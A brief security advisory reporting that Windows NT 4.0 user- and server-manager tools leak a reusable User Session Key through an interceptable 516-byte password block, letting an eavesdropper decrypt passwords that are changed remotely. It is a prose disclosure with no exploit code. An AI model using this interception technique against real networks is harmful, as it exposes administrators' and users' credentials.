NT Subject to User Session Key Resuse Reported June 5 by Luke Kenneth Casson Leighton
Windows NT 4.0
When an administrator uses USRMGR.EXE or SRVMGR.EXE to remote add users or workstations to
a domain, or changes a user"s password, the tool sends an encrypted 516-byte password
block over the network. The data block can be intercepted and systematically taken apart
to reveal a User Session Key, which can then be used decrypt further communication
intercepted between the administrator and the domain controllers. For example, if an
administrator changes a user"s password remotely, that password could be decrypted to
reveal the clear text version using the captured User Session Key.
Microsoft is aware of this matter, however no response was
known at the time of this writing.
CREDITS Discovered and reported by Luke Kenneth Casson